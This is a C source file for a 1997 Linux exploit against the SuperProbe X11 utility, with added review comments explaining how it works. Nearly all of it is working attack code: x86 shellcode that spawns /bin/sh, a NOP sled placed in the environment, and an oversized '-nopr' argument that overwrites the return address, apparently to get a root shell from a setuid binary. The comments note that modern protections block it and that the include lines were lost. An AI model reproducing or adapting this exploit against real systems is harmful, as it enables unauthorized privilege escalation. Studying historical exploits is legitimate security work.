/*
 * SuperProbe buffer overflow exploit for Linux, tested on Slackware 3.1
 * Copyright (c) 1997 by Solar Designer
 */

/* NOTE(review): the three header names were lost when this listing was
 * extracted (angle-bracket text stripped).  The calls below (memset, strcpy,
 * setenv, execl) need the string, stdlib and unistd headers — confirm against
 * the original source before building; as written this does not compile. */
#include
#include
#include

/* Payload bytes handed to the target through its environment (see main).
 * The trailing literals are concatenated onto the machine code; the
 * "/bin/sh" path is the only part readable without disassembly. */
char *shellcode =
    "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
    "\xff\xd4\x31\xc0\x8d\x51\x04\x89\xcf\x89\x02\xb0\x2e\x40\xfc\xae\x75\xfd"
    "\x89\x39\x89\xfb\x40\xae\x75\xfd\x88\x67\xff\xb0\x0b\xcd\x80\x31\xc0\x40"
    "\x31\xdb\xcd\x80/"
    "/bin/sh"
    "0";

/* Returns the current stack pointer.  Relies on two non-portable facts:
 * the asm is x86-32 (%esp/%eax), and the caller receives whatever is left
 * in %eax because the function has no return statement — undefined
 * behaviour in standard C; any ABI other than i386 breaks it. */
char *get_sp() { asm("movl %esp,%eax"); }

#define bufsize 8192    /* size of the environment block built in main */
#define alignment 0     /* byte offset applied to the stack-address guess at buffer[72] */

char buffer[bufsize];   /* scratch buffer: first the environment payload, then the argument */

/* Implicit-int main (pre-C99).  Builds the environment block and the
 * oversized argument, then replaces this process with SuperProbe.  The
 * 72-byte offset is a property of the target binary, not of this file,
 * and cannot be verified here. */
main()
{
    int i;

    /* First half: repeated copies of a stack address taken from this
     * process, on the assumption that the target's stack lies at a similar
     * address — exactly the assumption ASLR was introduced to break. */
    for (i = 0; i < bufsize / 2; i += 4)
        *(char **)&buffer[i] = get_sp() - 2048;
    /* Second half: 0x90 (x86 NOP) padding so an imprecise landing still
     * reaches the payload copied near the end of the block. */
    memset(&buffer[bufsize / 2], 0x90, bufsize / 2);
    strcpy(&buffer[bufsize - 256], shellcode);
    /* The whole block is exported into the environment of the exec'd
     * program; presumably this depends on the target's stack being
     * executable, which non-executable stack mappings remove. */
    setenv("SHELLCODE", buffer, 1);

    /* The argument following -nopr: 72 filler bytes, a pointer (stack
     * address guess, tunable via `alignment`), then the terminator.  A
     * stack-protector canary in the target would abort before this pointer
     * is used. */
    memset(buffer, 'x', 72);
    *(char **)&buffer[72] = get_sp() - 6144 - alignment;
    buffer[76] = 0;
    execl("/usr/X11/bin/SuperProbe", "SuperProbe", "-nopr", buffer, NULL);
}